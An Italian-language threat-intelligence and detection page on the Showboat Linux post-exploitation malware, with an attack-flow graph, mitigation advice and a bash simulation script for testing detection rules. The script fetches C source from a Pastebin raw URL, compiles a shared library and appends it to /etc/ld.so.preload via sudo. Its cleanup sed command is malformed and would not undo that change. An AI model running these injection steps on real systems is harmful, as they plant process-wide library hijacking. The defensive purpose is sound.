Il Malware Showboat Prende di Mira le Aziende di Telecomunicazioni del Medio Oriente dal 2022
Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Showboat è un framework modulare di post-sfruttamento per Linux costruito per ambienti AMD x86-64. Attivo dalla metà del 2022, è progettato per mantenere un accesso silenzioso e a lungo termine all’interno di reti compromesse. Il malware utilizza metodi avanzati di evasione, inclusa la crittografia XOR e l’abuso del linker dinamico per nascondere i processi dannosi.
Investigazione
L’indagine ha tracciato l’infrastruttura di comando e controllo a Chengdu, Cina, che, insieme alle tattiche, tecniche e procedure osservate, suggerisce legami con attori della minaccia allineati con la RPC. L’analisi tecnica ha mostrato che il malware si basa su una chiave XOR codificata per decrittare la sua configurazione e abusa di ld.so.preload per ottenere stealth sui sistemi infettati.
Mitigazione
I difensori dovrebbero monitorare le modifiche non autorizzate a /etc/ld.so.preload e l’uso sospetto del gcc compilatore su host Linux di produzione. Si raccomanda inoltre di distribuire il monitoraggio della rete capace di identificare il comportamento di beaconing, anche quando il timing è casualizzato, e di utilizzare il monitoraggio dell’integrità per le librerie di sistema critiche.
Risposta
Se viene rilevata un’attività di Showboat, isolare immediatamente i sistemi Linux interessati dalla rete per interrompere ulteriori traffico di comando e controllo. Eseguire la ricerca forense della memoria per identificare gli oggetti condivisi iniettati e condurre un audit completo delle impostazioni di sistema e delle attività pianificate per confermare che tutti i meccanismi di persistenza siano stati rimossi.
graph TB %% Definizione delle classi classDef action fill:#99ccff classDef builtin fill:#cccccc classDef malware_entity fill:#ff9999 classDef network fill:#99ff99 %% Definizione dei nodi %% Fase 1: Configurazione iniziale action_decryption[“<b>Azione</b> – <b>T1027: File o informazioni offuscati</b><br/>Recupera la configurazione cifrata tramite XOR<br/>utilizzando la chiave incorporata: look me, AV!<br/>Obiettivo: telecom.webredirect[.]org”] class action_decryption action %% Fase 2: C2 ed esfiltrazione malware_showboat[“<b>Malware</b> – <b>Showboat</b><br/>Agente del ciclo di vita post-compromissione”] class malware_showboat malware_entity action_beaconing[“<b>Azione</b> – <b>T1071: Protocollo del livello applicativo</b><br/>Stabilisce il C2 tramite beacon periodici<br/>Utilizza intervalli di attesa casuali per eludere il rilevamento”] class action_beaconing action action_exfiltration[“<b>Azione</b> – <b>T1029: Trasferimento pianificato</b><br/>Raggruppa informazioni dell’host e screenshot in formato JSON<br/>Cifra e codifica i dati in Base64<br/>Utilizza la steganografia nei campi PNG per l’elusione”] class action_exfiltration action %% Fase 3: Occultamento e persistenza action_fetch_source[“<b>Azione</b> – <b>T1105: Trasferimento di strumenti in ingresso</b><br/>Recupera il file sorgente C ukpkmkk.c<br/>Origine: URL Pastebin”] class action_fetch_source action action_compile[“<b>Azione</b> – <b>T1059: Interprete dei comandi e degli script</b><br/>Compila ukpkmkk.c localmente sulla macchina vittima<br/>Genera una libreria condivisa dannosa”] class action_compile action action_hijack[“<b>Azione</b> – <b>T1574.006: Dirottamento del flusso di esecuzione: Dynamic Linker Hijacking</b><br/>Utilizza il meccanismo ld.so.preload<br/>Inietta /tmp/ukpkmkk.so nei processi”] class action_hijack action action_stealth[“<b>Azione</b> – <b>T1564: Nascondimento degli artefatti</b><br/>Intercetta chiamate di sistema come readdir()<br/>Nasconde i processi da ps e top tramite una lista di filtri”] class action_stealth action %% Connessioni malware_showboat –>|esegue| action_decryption action_decryption –>|stabilisce| action_beaconing action_beaconing –>|esfiltra_dati| action_exfiltration action_exfiltration –>|attiva_comando_nascosto| action_fetch_source action_fetch_source –>|porta_a| action_compile action_compile –>|produce_libreria| action_hijack action_hijack –>|raggiunge| action_stealth %% Flusso finale action_stealth -.->|mantiene| malware_showboat
Flusso di Attacco
Rilevamenti
Tentativo di Comunicazione Dominio Pastebin Sospetto (tramite proxy)
Visualizza
Upload/Download di File Remoti tramite Strumenti Standard (via cmdline)
Visualizza
Rilevamento di Attività Beacon del Malware Showboat [Creazione Processo Linux]
Visualizza
Rileva Attività del Malware Showboat – Modifica di ld.so.preload e Recupero File Sorgente [Creazione Processo Linux]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Controllo Pre-volo di Telemetria & Baseline deve essere passato.
Motivazione: Questa sezione dettaglia l’esatta esecuzione della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare l’esatta telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.
-
Narrazione dell’Attacco & Comandi: L’attaccante mira a stabilire un’intercettazione persistente delle chiamate di sistema. Cominciano scaricando un file sorgente C dannoso da un URL raw di Pastebin utilizzando
curl. Una volta scaricato, usanogcccon i-sharedand-fPICflag per compilare il sorgente in un file oggetto condiviso denominatomalicious.so. Infine, tentano di ottenere la persistenza aggiungendo il percorso di questa libreria a/etc/ld.so.preload. Questa sequenza è progettata per iniettare la libreria dannosa in ogni processo nel sistema. -
Script di Test di Regressione:
#!/bin/bash # Simulazione dei TTP del Malware Showboat # 1. Simula il recupero del C source da Pastebin # Nota: Utilizzo di un vero link raw pastebin (mockato per logica) o simulazione della stringa echo "Creazione di simulazione di download da pastebin fittizio..." echo 'void __attribute__((constructor)) init() {}' > fake_malware.c # Questo comando attiva la parte 'selection_fetch' della regola curl -s https://pastebin.com/raw/example_id -o fake_malware.c # 2. Simula la compilazione di un oggetto condiviso # Questo comando attiva la parte 'selection_compile' della regola # (selection_fetch E selection_compile) gcc -shared -fPIC -o /tmp/malicious.so fake_malware.c # 3. Simula la modifica di ld.so.preload # Questo comando attiva la parte 'selection_preload' della regola echo "/tmp/malicious.so" | sudo tee -a /etc/ld.so.preload echo "Simulazione completa. Controlla SIEM per avvisi." -
Comandi di Pulizia:
#!/bin/bash # Pulisci simulazione artefatti # Rimuovi la libreria dannosa e il sorgente sudo rm -f /tmp/malicious.so rm -f fake_malware.c # Rimuovi la voce da ld.so.preload (Richiede cautela) # Questo comando sed rimuove la linea contenente /tmp/malicious.so sudo sed -i '//tmp/malicious.so/d' /etc/ld.so.preload echo "Pulizia completata."